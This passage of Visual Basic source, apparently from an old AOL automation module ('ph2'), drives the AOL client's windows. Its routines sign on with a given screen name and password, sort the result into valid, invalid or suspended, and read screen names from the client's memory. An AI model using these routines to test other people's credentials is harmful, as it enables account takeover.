  8003. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8004. soButx& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8005. If soButx& <> 0& Then soBut& = soButx&
  8006. soEdit& = FindWindowEx(soWin&, 0&, "_AOL_Edit", vbNullString)
  8007. soCNTL& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  8008. soCNTL& = FindWindowEx(soWin&, soCNTL&, "RICHCNTL", vbNullString)
  8009. Loop Until soWin& <> 0& And soCombo& <> 0& And soBut& <> 0&
  8010.  
  8011. Call SendMessage(soCombo&, CB_SETCURSEL, 0&, 0&)
  8012.  
  8013. Call ModalKill
  8014.  
  8015. Call Temp_Convert(screenname$)
  8016.  
  8017. Call SendMessageByString(soEdit&, WM_SETTEXT, 0&, Password$)
  8018. Call SendMessageByString(soCNTL&, WM_SETTEXT, 0&, "")
  8019.  
  8020. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  8021. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  8022.  
  8023. Do
  8024. DoEvents
  8025. conModal& = FindWindow("_AOL_Modal", "")
  8026. modPWStore& = FindWindow("_AOL_Modal", "Password Store Information Box")
  8027. Loop Until conModal& <> 0&
  8028.  
  8029. Call PostMessage(modPWStore&, WM_CLOSE, 0&, 0&)
  8030.  
  8031. Do
  8032. DoEvents
  8033. welWin& = FindWelcome&
  8034.  
  8035. gWin& = FindSignOnWindow&
  8036. gCNTL& = FindWindowEx(gWin&, 0&, "RICHCNTL", vbNullString)
  8037. gCNTL& = FindWindowEx(gWin&, gCNTL&, "RICHCNTL", vbNullString)
  8038. gString$ = GetText(gCNTL&)
  8039.  
  8040. iWin& = FindInvalidPW&
  8041. iBut& = FindWindowEx(iWin&, 0&, "_AOL_Icon", vbNullString)
  8042.  
  8043. aol& = FindWindow("AOL Frame25", vbNullString)
  8044. If aol& = 0& Then Exit Function
  8045. Loop Until welWin& <> 0& Or InStr(1, gString$, "Invalid password") <> 0& Or InStr(1, gString$, "This account is not currently active") <> 0& Or InStr(1, gString$, "Your connection to AOL has been lost") <> 0& Or iWin& <> 0& And iBut& <> 0&
  8046.  
  8047. If welWin& <> 0& Then
  8048. SignOnQuick& = 1&
  8049. ElseIf InStr(1, gString$, "Invalid password") <> 0& Then
  8050. SignOnQuick& = 2&
  8051. ElseIf InStr(1, gString$, "This account is not currently active") <> 0& Then
  8052. SignOnQuick& = 4&
  8053. ElseIf InStr(1, gString$, "Your connection to AOL has been lost") <> 0& Then
  8054. Do
  8055. DoEvents
  8056. msgWin& = FindWindow("#32770", "America Online")
  8057. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  8058. Loop Until msgWin& <> 0& And msgBut& <> 0&
  8059.  
  8060. Call PostMessage(msgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  8061. Call PostMessage(msgBut&, WM_KEYUP, VK_SPACE, 0&)
  8062.  
  8063. SignOnQuick& = 3&
  8064. End If
  8065. End Function
  8066.  
  8067. Public Function SignOnQuick25(screenname As String, Password As String) As Long
  8068. 'similar to the other signon methods
  8069. Dim aol As Long, mdi As Long, soWin As Long, soCombo As Long
  8070. Dim soBut As Long, soEdit As Long, lngCombo As Long
  8071. Dim connectingModal As Long, soStatic As Long, iWin As Long
  8072. Dim welWin As Long, soString As String, iBut As Long
  8073. Dim csWin As Long, csBut As Long, csStatic As Long, csString As String
  8074. Dim sIDMod As Long, sIDBut As Long
  8075.  
  8076. If GetUser <> "" Then
  8077. Call SignOff25
  8078. If IsNumeric(GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini")) = True Then
  8079. pause (GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini"))
  8080. End If
  8081. End If
  8082.  
  8083. Do
  8084. DoEvents
  8085. aol& = FindWindow("AOL Frame25", vbNullString)
  8086. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  8087. soWin& = FindSignOnWindow
  8088. soCombo& = FindWindowEx(soWin&, 0&, "_AOL_Combobox", vbNullString)
  8089. soBut& = FindWindowEx(soWin&, 0&, "_AOL_Icon", vbNullString)
  8090. If AOLVersion = "3" Then
  8091. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8092. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8093. End If
  8094. soEdit& = FindWindowEx(soWin&, 0&, "_AOL_Edit", vbNullString)
  8095. If AOLVersion = "2.5" Then
  8096. soStatic& = FindWindowEx(soWin&, 0&, "_AOL_Static", vbNullString)
  8097. soStatic& = FindWindowEx(soWin&, soStatic&, "_AOL_Static", vbNullString)
  8098. Else
  8099. soStatic& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  8100. soStatic& = FindWindowEx(soWin&, soStatic&, "RICHCNTL", vbNullString)
  8101. End If
  8102. Loop Until soWin& <> 0& And soCombo& <> 0& And soBut& <> 0&
  8103.  
  8104. Call SendMessage(soCombo&, CB_SETCURSEL, 0&, 0&)
  8105.  
  8106. Call ModalKill
  8107.  
  8108. Call Temp_Convert(screenname$)
  8109.  
  8110. 'AppActivate GetText(AOL&)
  8111.  
  8112. Call SendMessageByString(soEdit&, WM_SETTEXT, 0&, Password$)
  8113. Call SendMessageByString(soStatic&, WM_SETTEXT, 0&, "")
  8114.  
  8115. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  8116. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  8117.  
  8118. Do
  8119. DoEvents
  8120. aol& = FindWindow("AOL Frame25", vbNullString)
  8121. If aol& = 0& Then SignOnQuick25 = 0&: Exit Function
  8122. welWin& = FindWelcome&
  8123.  
  8124. soWin& = FindSignOnWindow
  8125. If AOLVersion = "2.5" Then
  8126. soStatic& = FindWindowEx(soWin&, 0&, "_AOL_Static", vbNullString)
  8127. soStatic& = FindWindowEx(soWin&, soStatic&, "_AOL_Static", vbNullString)
  8128. Else
  8129. soStatic& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  8130. soStatic& = FindWindowEx(soWin&, soStatic&, "RICHCNTL", vbNullString)
  8131. End If
  8132. soString$ = GetText(soStatic&)
  8133.  
  8134. iWin& = FindInvalidPW&
  8135. iBut& = FindWindowEx(iWin&, 0&, "_AOL_Button", "Cancel")
  8136.  
  8137. sIDMod& = FindWindow("_AOL_Modal", "SecurID Code")
  8138. sIDBut& = FindWindowEx(sIDMod&, 0&, "_AOL_Button", vbNullString)
  8139. sIDBut& = FindWindowEx(sIDMod&, sIDBut&, "_AOL_Button", vbNullString)
  8140. Loop Until welWin& <> 0& Or soWin& <> 0& And soStatic& <> 0& And soString$ <> "" Or iWin& <> 0& And iBut& <> 0& Or sIDMod& <> 0& And sIDBut& <> 0&
  8141.  
  8142. If welWin& <> 0& Then
  8143. SignOnQuick25 = 1&
  8144. Exit Function
  8145. End If
  8146.  
  8147. If sIDMod& <> 0& And sIDBut& <> 0& Then
  8148. Call PostMessage(sIDBut&, WM_KEYDOWN, VK_SPACE, 0&)
  8149. Call PostMessage(sIDBut&, WM_KEYUP, VK_SPACE, 0&)
  8150. SignOnQuick25 = 5&
  8151. Exit Function
  8152. End If
  8153.  
  8154. If iWin& <> 0& Then
  8155. Call PostMessage(iBut&, WM_KEYDOWN, VK_SPACE, 0&)
  8156. Call PostMessage(iBut&, WM_KEYUP, VK_SPACE, 0&)
  8157. Call ModalKill
  8158. SignOnQuick25 = 2&
  8159. Exit Function
  8160. End If
  8161.  
  8162. If soStatic& <> 0& Then
  8163. If InStr(1, soString$, "This account is not currently active") <> 0& Then
  8164. SignOnQuick25 = 4&
  8165. ElseIf InStr(1, soString$, "Invalid account") <> 0& Then
  8166. SignOnQuick25 = 4&
  8167. ElseIf InStr(1, soString$, "Invalid password") <> 0& Then
  8168. SignOnQuick25 = 2&
  8169. ElseIf InStr(1, soString$, "You have been disconnected from America Online") <> 0& Then
  8170. Do
  8171. DoEvents
  8172. csWin& = FindWindow("#32770", "America Online")
  8173. csBut& = FindWindowEx(csWin&, 0&, "Button", "OK")
  8174. csStatic& = FindWindowEx(csWin&, 0&, "Static", vbNullString)
  8175. csStatic& = FindWindowEx(csWin&, csStatic&, "Static", vbNullString)
  8176. csString$ = GetText(csStatic&)
  8177. Loop Until csWin& <> 0& And csBut& <> 0& And csStatic& <> 0& And csString$ <> ""
  8178.  
  8179. Call PostMessage(csBut&, WM_KEYDOWN, VK_SPACE, 0&)
  8180. Call PostMessage(csBut&, WM_KEYUP, VK_SPACE, 0&)
  8181.  
  8182. If InStr(1, csString$, "Your account is signed on using") <> 0& Then
  8183. SignOnQuick25 = 3&
  8184. ElseIf InStr(1, csString$, "This account has been suspended") <> 0& Then
  8185. SignOnQuick25 = 4&
  8186. End If
  8187. End If
  8188. End If
  8189. End Function
  8190.  
  8191. Public Sub SnapCheck(frm As Form)
  8192. 'snaps form to screen
  8193. 'sort of like winamp
  8194. If frm.Left < 0& Then
  8195. Do
  8196. DoEvents
  8197. frm.Left = frm.Left + 10
  8198. Loop Until frm.Left >= 0&
  8199. frm.Left = 0&
  8200. End If
  8201.  
  8202. If frm.Top < 0& Then
  8203. Do
  8204. DoEvents
  8205. frm.Top = frm.Top + 10
  8206. Loop Until frm.Top >= 0&
  8207. frm.Top = 0&
  8208. End If
  8209.  
  8210. If frm.Top + frm.Height > Screen.Height Then
  8211. Do
  8212. DoEvents
  8213. frm.Top = frm.Top - 10
  8214. Loop Until frm.Top <= Screen.Height - frm.Height
  8215. frm.Top = Screen.Height - frm.Height
  8216. End If
  8217.  
  8218. If frm.Left + frm.Width > Screen.Width Then
  8219. Do
  8220. DoEvents
  8221. frm.Left = frm.Left - 10
  8222. Loop Until frm.Left <= Screen.Width - frm.Width
  8223. frm.Left = Screen.Width - frm.Width
  8224. End If
  8225.  
  8226. If frm.Left - 400 < 0& Then
  8227. Do
  8228. DoEvents
  8229. frm.Left = frm.Left - 10
  8230. Loop Until frm.Left <= 0&
  8231. frm.Left = 0&
  8232. End If
  8233.  
  8234. If frm.Top - 400 < 0& Then
  8235. Do
  8236. DoEvents
  8237. frm.Top = frm.Top - 10
  8238. Loop Until frm.Top <= 0&
  8239. frm.Top = 0&
  8240. End If
  8241.  
  8242. If (frm.Left + frm.Width) + 400 > Screen.Width Then
  8243. Do
  8244. DoEvents
  8245. frm.Left = frm.Left + 10
  8246. Loop Until frm.Left + frm.Width >= Screen.Width
  8247. frm.Left = Screen.Width - frm.Width
  8248. End If
  8249.  
  8250. If (frm.Top + frm.Height) + 400 > Screen.Height Then
  8251. Do
  8252. DoEvents
  8253. frm.Top = frm.Top + 10
  8254. Loop Until frm.Top + frm.Height >= Screen.Height
  8255. frm.Top = Screen.Height - frm.Height
  8256. End If
  8257. End Sub
  8258.  
  8259. Public Function SNfromIM(IMhWnd As Long) As String
  8260. 'gets the screen name from an instant message..
  8261. 'you have to input the window handle of the im.
  8262.  
  8263. 'example:
  8264. ' MsgBox SNFromIM(findrecievedim)
  8265. '
  8266. 'that would msgbox a screen name that im'd you
  8267. Dim imStr As String, imColon As Long
  8268.  
  8269. If IMhWnd& = 0& Then SNfromIM$ = "": Exit Function
  8270.  
  8271. imStr$ = GetText(IMhWnd&)
  8272.  
  8273. If Trim(imStr$) = "" Then SNfromIM$ = "": Exit Function
  8274.  
  8275. imColon& = InStr(1, imStr$, ": ")
  8276. SNfromIM$ = Mid(imStr$, imColon& + 2, Len(imStr$) - imColon& - 1)
  8277. End Function
  8278.  
  8279. Public Function SNFromLastChatLine(ChatLine As String) As String
  8280. On Error Resume Next
  8281. 'gets the sn from whatever string you put in
  8282. Dim snColon As Long, snName As String
  8283.  
  8284. snColon& = InStr(1, ChatLine$, ":")
  8285. snName$ = Left(ChatLine$, snColon& - 1)
  8286. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  8287. snName$ = Right(snName$, Len(snName$) - 1)
  8288. End If
  8289.  
  8290. SNFromLastChatLine = snName$
  8291. End Function
  8292.  
  8293. Public Sub StartSO(screenname As String)
  8294. 'starts signon.. on 4.0 and 5.0
  8295. Dim aol As Long, mdi As Long, soWin As Long, soCombo As Long
  8296. Dim soBut As Long, soEdit As Long, lngCombo As Long, modPWStore As Long
  8297. Dim conModal As Long, soCNTL As Long, soButx As Long
  8298.  
  8299. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  8300. Call StartSO25(screenname$)
  8301. Exit Sub
  8302. End If
  8303.  
  8304. If GetUser <> "" Then
  8305. Call SignOff
  8306. If IsNumeric(GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini")) = True Then
  8307. pause (GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini"))
  8308. End If
  8309. End If
  8310.  
  8311. Do
  8312. DoEvents
  8313. aol& = FindWindow("AOL Frame25", vbNullString)
  8314. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  8315. soWin& = FindSignOnWindow
  8316. soCombo& = FindWindowEx(soWin&, 0&, "_AOL_Combobox", vbNullString)
  8317. soBut& = FindWindowEx(soWin&, 0&, "_AOL_Icon", vbNullString)
  8318. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8319. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8320. soButx& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8321. If soButx& <> 0& Then soBut& = soButx&
  8322. soEdit& = FindWindowEx(soWin&, 0&, "_AOL_Edit", vbNullString)
  8323. soCNTL& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  8324. soCNTL& = FindWindowEx(soWin&, soCNTL&, "RICHCNTL", vbNullString)
  8325. Loop Until soWin& <> 0& And soCombo& <> 0& And soBut& <> 0&
  8326.  
  8327. Call SendMessage(soCombo&, CB_SETCURSEL, 0&, 0&)
  8328.  
  8329. Call ModalKill
  8330.  
  8331. Call Temp_Convert(screenname$)
  8332.  
  8333. Call SendMessageByString(soEdit&, WM_SETTEXT, 0&, "pH v²")
  8334. Call SendMessageByString(soCNTL&, WM_SETTEXT, 0&, "")
  8335.  
  8336. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  8337.  
  8338. Do
  8339. DoEvents
  8340. conModal& = FindWindow("_AOL_Modal", "")
  8341. modPWStore& = FindWindow("_AOL_Modal", "Password Store Information Box")
  8342. Loop Until conModal& <> 0&
  8343.  
  8344. Call PostMessage(modPWStore&, WM_CLOSE, 0&, 0&)
  8345. End Sub
  8346.  
  8347. Public Sub StartSO25(screenname As String)
  8348. 'starts signon.. on 3.0 and 2.5
  8349. Dim aol As Long, mdi As Long, soWin As Long, soCombo As Long
  8350. Dim soBut As Long, soEdit As Long, lngCombo As Long
  8351. Dim connectingModal As Long, soStatic As Long
  8352.  
  8353. If GetUser <> "" Then
  8354. Call SignOff25
  8355. If IsNumeric(GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini")) = True Then
  8356. pause (GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini"))
  8357. pause (1)
  8358. End If
  8359. End If
  8360.  
  8361. Do
  8362. DoEvents
  8363. aol& = FindWindow("AOL Frame25", vbNullString)
  8364. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  8365. soWin& = FindSignOnWindow
  8366. soCombo& = FindWindowEx(soWin&, 0&, "_AOL_Combobox", vbNullString)
  8367. soBut& = FindWindowEx(soWin&, 0&, "_AOL_Icon", vbNullString)
  8368. If AOLVersion = "3" Then
  8369. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8370. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
  8371. End If
  8372. soEdit& = FindWindowEx(soWin&, 0&, "_AOL_Edit", vbNullString)
  8373. soStatic& = FindWindowEx(soWin&, 0&, "_AOL_Static", vbNullString)
  8374. soStatic& = FindWindowEx(soWin&, soStatic&, "_AOL_Static", vbNullString)
  8375. Loop Until soWin& <> 0& And soCombo& <> 0& And soBut& <> 0&
  8376.  
  8377. Call SendMessage(soCombo&, CB_SETCURSEL, 0&, 0&)
  8378.  
  8379. Call ModalKill
  8380.  
  8381. Call Temp_Convert(screenname$)
  8382.  
  8383. Call SendMessageByString(soEdit&, WM_SETTEXT, 0&, "pH v²")
  8384. Call SendMessageByString(soStatic&, WM_SETTEXT, 0&, "")
  8385.  
  8386. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  8387. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  8388.  
  8389. Do
  8390. DoEvents
  8391. connectingModal& = FindWindow("_AOL_Modal", vbNullString)
  8392. Loop Until connectingModal& <> 0&
  8393. End Sub
  8394.  
  8395. Public Function StringCount(Text As String, strCount As String) As Long
  8396. 'counts number of times a string appears in a larger string
  8397. Dim iStr As Long, ICount As Long
  8398.  
  8399. iStr& = InStr(1, Text, strCount$)
  8400.  
  8401. If iStr& = 0& Then
  8402. StringCount = 0&
  8403. Exit Function
  8404. Else
  8405. ICount& = 1&
  8406. Do
  8407. 'DoEvents
  8408. iStr& = InStr(iStr& + 1, Text, strCount$)
  8409. If iStr& = 0& Then
  8410. StringCount = ICount&
  8411. Exit Function
  8412. Else
  8413. ICount& = ICount& + 1
  8414. End If
  8415. Loop
  8416. End If
  8417. End Function
  8418.  
  8419. Public Sub SwitchScreenname(switchSN As String, switchPW As String)
  8420. 'switches screenname on aol 4.0
  8421. Dim aol As Long, mdi As Long, sWin As Long, sList As Long, lngSwitch As Long
  8422. Dim cProcess As Long, itmHold As Long, screenname As String
  8423. Dim psnHold As Long, rBytes As Long, Index As Long, Room As Long
  8424. Dim sThread As Long, mThread As Long, iTab As Long, switchModal As Long, switchIcon As Long
  8425. Dim pwWin As Long, PWEdit As Long, pwIcon As Long
  8426. Dim iWin As Long, iIcon As Long
  8427.  
  8428. aol& = FindWindow("AOL Frame25", vbNullString)
  8429. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  8430.  
  8431. lngSwitch = -1
  8432.  
  8433. Call RunMenuByString("switch scree&n")
  8434.  
  8435. Do
  8436. DoEvents
  8437. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Switch Screen Names")
  8438. sList& = FindWindowEx(sWin&, 0&, "_AOL_Listbox", vbNullString)
  8439. Loop Until sWin& <> 0& And sList& <> 0& And SendMessage(sList&, LB_GETCOUNT, 0&, 0&) <> 0&
  8440.  
  8441. On Error Resume Next
  8442. sThread& = GetWindowThreadProcessId(sList, cProcess&)
  8443. mThread& = OpenProcess(PROCESS_READ Or RIGHTS_REQUIRED, False, cProcess&)
  8444. If mThread& Then
  8445. For Index& = 0 To SendMessage(sList&, LB_GETCOUNT, 0, 0) - 1
  8446. screenname$ = String$(4, vbNullChar)
  8447. itmHold& = SendMessage(sList&, LB_GETITEMDATA, ByVal CLng(Index&), ByVal 0&)
  8448. itmHold& = itmHold& + 24
  8449. Call ReadProcessMemory(mThread&, itmHold&, screenname$, 4, rBytes)
  8450. Call CopyMemory(psnHold&, ByVal screenname$, 4)
  8451. psnHold& = psnHold& + 6
  8452. screenname$ = String$(17, vbNullChar)
  8453. Call ReadProcessMemory(mThread&, psnHold&, screenname$, Len(screenname$), rBytes&)
  8454. screenname$ = Left$(screenname$, InStr(screenname$, vbNullChar) - 1)
  8455. iTab& = InStr(3, screenname$, Chr(9))
  8456. screenname$ = Mid(screenname$, 2, Len(screenname$) - iTab& + 1)
  8457. If InStr(1, LCase(TrimSpaces(screenname$)), LCase(TrimSpaces(switchSN$))) <> 0& Or LCase(TrimSpaces(screenname$)) = LCase(TrimSpaces(switchSN$)) Then
  8458. lngSwitch& = Index&
  8459. Exit For
  8460. End If
  8461. Next Index&
  8462. Call CloseHandle(mThread)
  8463. End If
  8464.  
  8465. If lngSwitch& <> -1 Then
  8466. Call SendMessage(sList&, LB_SETCURSEL, lngSwitch&, 0&)
  8467. Call PostMessage(sList&, WM_LBUTTONDBLCLK, 0&, 0&)
  8468.  
  8469. Do
  8470. DoEvents
  8471. switchModal& = FindWindow("_AOL_Modal", "Switch Screen Name")
  8472. switchIcon& = FindWindowEx(switchModal&, 0&, "_AOL_Icon", vbNullString)
  8473. Loop Until switchModal& <> 0& And switchIcon& <> 0&
  8474.  
  8475. Do
  8476. DoEvents
  8477. switchModal& = FindWindow("_AOL_Modal", "Switch Screen Name")
  8478. switchIcon& = FindWindowEx(switchModal&, 0&, "_AOL_Icon", vbNullString)
  8479. Call SendMessage(switchIcon&, WM_LBUTTONDOWN, 0&, 0&)
  8480. Call SendMessage(switchIcon&, WM_LBUTTONUP, 0&, 0&)
  8481. Loop Until switchModal& = 0&
  8482.  
  8483. Do
  8484. DoEvents
  8485. pwWin& = FindWindow("_AOL_Modal", "Switch Screen Name Password")
  8486. PWEdit& = FindWindowEx(pwWin&, 0&, "_AOL_Edit", vbNullString)
  8487. pwIcon& = FindWindowEx(pwWin&, 0&, "_AOL_Icon", vbNullString)
  8488. Loop Until pwWin& <> 0& And PWEdit& <> 0& And pwIcon& <> 0&
  8489.  
  8490. Call SendMessageByString(PWEdit&, WM_SETTEXT, 0&, switchPW$)
  8491.  
  8492. Call SendMessage(pwIcon&, WM_LBUTTONDOWN, 0&, 0&)
  8493. Call SendMessage(pwIcon&, WM_LBUTTONUP, 0&, 0&)
  8494.  
  8495. Do
  8496. DoEvents
  8497. iWin& = FindInvalidPW&
  8498. iIcon& = FindWindowEx(iWin&, 0&, "_AOL_Icon", vbNullString)
  8499. iIcon& = FindWindowEx(iWin&, iIcon&, "_AOL_Icon", vbNullString)
  8500. Loop Until iWin& <> 0& Or GetUser <> ""
  8501.  
  8502. If iWin& <> 0& Then
  8503. Call SendMessage(iIcon&, WM_LBUTTONDOWN, 0&, 0&)
  8504. Call SendMessage(iIcon&, WM_LBUTTONUP, 0&, 0&)
  8505. Do
  8506. DoEvents
  8507. Loop Until FindSignOnWindow <> 0&
  8508. End If
  8509. Else
  8510. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  8511. End If
  8512.  
  8513.  
  8514. End Sub
  8515.  
  8516. Public Sub Temp_Convert(SN$)
  8517. 'temporarily converts a screenname at
  8518. 'aol's signon windows
  8519. Dim aol As Long, mdi As Long, Wel As Long, cb As Long
  8520.  
  8521. Do
  8522. DoEvents
  8523. aol& = FindWindow("AOL Frame25", vbNullString)
  8524. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  8525. Wel& = FindSignOnWindow
  8526. cb& = FindWindowEx(Wel&, 0&, "_AOL_Combobox", vbNullString)
  8527. Loop Until Wel& <> 0 And cb& <> 0
  8528.  
  8529. Call SendMessage(cb&, WM_LBUTTONDOWN, 0&, 0&)
  8530. Call SendMessage(cb&, WM_LBUTTONUP, 0&, 0&)
  8531.  
  8532. Call CB_Change(cb&, 0&, "" & SN$)
  8533. Call SendMessage(cb&, WM_USER + 14, 0, 0&)
  8534.  
  8535. Call SendMessage(cb&, WM_LBUTTONDOWN, 0&, 0&)
  8536. Call SendMessage(cb&, WM_LBUTTONUP, 0&, 0&)
  8537.  
  8538. End Sub
  8539.  
  8540. Public Function TempSignOn(screenname As String, Password As String) As Long
  8541. 'signs on account temporarily
  8542. Dim aol As Long, mdi As Long, welWin As Long, gWin As Long
  8543. Dim gCNTL As Long, iWin As Long, iEdit As Long
  8544. Dim gString As String, msgWin As Long, msgBut As Long
  8545.  
  8546. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  8547. TempSignOn = TempSignOn25(screenname$, Password$)
  8548. Exit Function
  8549. End If
  8550.  
  8551. Call StartSO(screenname$)
  8552.  
  8553. Do
  8554. DoEvents
  8555. iWin& = FindInvalidPW&
  8556. iEdit& = FindWindowEx(iWin&, 0&, "_AOL_Edit", vbNullString)
  8557.  
  8558. gWin& = FindSignOnWindow&
  8559. gCNTL& = FindWindowEx(gWin&, 0&, "RICHCNTL", vbNullString)
  8560. gCNTL& = FindWindowEx(gWin&, gCNTL&, "RICHCNTL", vbNullString)
  8561. If GetText(gCNTL&) <> "" Then GoTo AfterInvalidPW
  8562. Loop Until iWin& <> 0& And iEdit& <> 0&
  8563.  
  8564. Call SendMessageByString(iEdit&, WM_SETTEXT, 0&, Password$)
  8565. Call SendMessageLong(iEdit&, WM_CHAR, ENTER_KEY, 0&)
  8566.  
  8567. AfterInvalidPW:
  8568.  
  8569. Do
  8570. DoEvents
  8571. welWin& = FindWelcome&
  8572.  
  8573. gWin& = FindSignOnWindow&
  8574. gCNTL& = FindWindowEx(gWin&, 0&, "RICHCNTL", vbNullString)
  8575. gCNTL& = FindWindowEx(gWin&, gCNTL&, "RICHCNTL", vbNullString)
  8576. gString$ = GetText(gCNTL&)
  8577. Loop Until welWin& <> 0& Or InStr(1, gString$, "Invalid password") <> 0& Or InStr(1, gString$, "This account is not currently active") <> 0& Or InStr(1, gString$, "Your connection to AOL has been lost") <> 0&
  8578.  
  8579. If welWin& <> 0& Then
  8580. TempSignOn& = 1&
  8581. ElseIf InStr(1, gString$, "Invalid password") <> 0& Then
  8582. TempSignOn& = 2&
  8583. ElseIf InStr(1, gString$, "This account is not currently active") <> 0& Then
  8584. TempSignOn& = 4&
  8585. ElseIf InStr(1, gString$, "Your connection to AOL has been lost") <> 0& Then
  8586. Do
  8587. DoEvents
  8588. msgWin& = FindWindow("#32770", "America Online")
  8589. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  8590. Loop Until msgWin& <> 0& And msgBut& <> 0&
  8591.  
  8592. Call PostMessage(msgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  8593. Call PostMessage(msgBut&, WM_KEYUP, VK_SPACE, 0&)
  8594.  
  8595. TempSignOn& = 3&
  8596. End If
  8597. End Function
  8598.  
  8599. Public Function TempSignOn25(screenname As String, Password As String) As Long
  8600. 'signs on sn temporarily on 2.5
  8601. Dim aol As Long, mdi As Long, soWin As Long, soCombo As Long, soIcon As Long
  8602. Dim lngClick As Long, gWin As Long, gEditSN As Long, gEditPW As Long, gButton As Long
  8603. Dim soStatic As Long, soString As String, welWin As Long
  8604. Dim msgWin As Long, msgBut As Long, csWin As Long, csBut As Long, csStatic As Long, csString As String
  8605. Dim msgStatic As Long, MsgString As String, CheckForGB As Boolean
  8606. Dim iWin As Long, iEdit As Long, gCNTL As Long
  8607.  
  8608. Call StartSO25(screenname$)
  8609.  
  8610. Do
  8611. DoEvents
  8612. iWin& = FindInvalidPW&
  8613. iEdit& = FindWindowEx(iWin&, 0&, "_AOL_Edit", vbNullString)
  8614.  
  8615. gWin& = FindSignOnWindow&
  8616. If AOLVersion = "2.5" Then
  8617. gCNTL& = FindWindowEx(gWin&, 0&, "_AOL_Static", vbNullString)
  8618. gCNTL& = FindWindowEx(gWin&, gCNTL&, "_AOL_Static", vbNullString)
  8619. Else
  8620. gCNTL& = FindWindowEx(gWin&, 0&, "RICHCNTL", vbNullString)
  8621. gCNTL& = FindWindowEx(gWin&, gCNTL&, "RICHCNTL", vbNullString)
  8622. End If
  8623. If GetText(gCNTL&) <> "" Then GoTo AfterInvalidPW
  8624. Loop Until iWin& <> 0& And iEdit& <> 0&
  8625.  
  8626. Call SendMessageByString(iEdit&, WM_SETTEXT, 0&, Password$)
  8627. Call SendMessageLong(iEdit&, WM_CHAR, ENTER_KEY, 0&)
  8628.  
  8629. AfterInvalidPW:
  8630.  
  8631. Do
  8632. DoEvents
  8633. welWin& = FindWelcome&
  8634.  
  8635. soWin& = FindSignOnWindow
  8636. If AOLVersion = "2.5" Then
  8637. soStatic& = FindWindowEx(soWin&, 0&, "_AOL_Static", vbNullString)
  8638. soStatic& = FindWindowEx(soWin&, soStatic&, "_AOL_Static", vbNullString)
  8639. Else
  8640. soStatic& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  8641. soStatic& = FindWindowEx(soWin&, soStatic&, "RICHCNTL", vbNullString)
  8642. End If
  8643. soString$ = GetText(soStatic&)
  8644. 'MsgBox soString$
  8645. Loop Until welWin& <> 0& Or msgWin& <> 0& And msgBut& <> 0& Or soWin& <> 0& And soStatic& <> 0& And soString$ <> ""
  8646.  
  8647. If welWin& <> 0& Then
  8648. TempSignOn25 = 1&
  8649. Exit Function
  8650. End If
  8651.  
  8652. If soStatic& <> 0& Then
  8653. If InStr(1, soString$, "This account is not currently active") <> 0& Then
  8654. TempSignOn25 = 4&
  8655. ElseIf InStr(1, soString$, "Invalid account") <> 0& Then
  8656. TempSignOn25 = 4&
  8657. ElseIf InStr(1, soString$, "Invalid password") <> 0& Then
  8658. TempSignOn25 = 2&
  8659. ElseIf InStr(1, soString$, "You have been disconnected from America Online") <> 0& Then
  8660. Do
  8661. DoEvents
  8662. csWin& = FindWindow("#32770", "America Online")
  8663. csBut& = FindWindowEx(csWin&, 0&, "Button", "OK")
  8664. csStatic& = FindWindowEx(csWin&, 0&, "Static", vbNullString)
  8665. csStatic& = FindWindowEx(csWin&, csStatic&, "Static", vbNullString)
  8666. csString$ = GetText(csStatic&)
  8667. Loop Until csWin& <> 0& And csBut& <> 0& And csStatic& <> 0& And csString$ <> ""
  8668.  
  8669. Call PostMessage(csBut&, WM_KEYDOWN, VK_SPACE, 0&)
  8670. Call PostMessage(csBut&, WM_KEYUP, VK_SPACE, 0&)
  8671.  
  8672. If InStr(1, csString$, "Your account is signed on using") <> 0& Then
  8673. TempSignOn25 = 3&
  8674. ElseIf InStr(1, csString$, "This account has been suspended") <> 0& Then
  8675. TempSignOn25 = 4&
  8676. End If
  8677. End If
  8678. End If
  8679.  
  8680. End Function
  8681.  
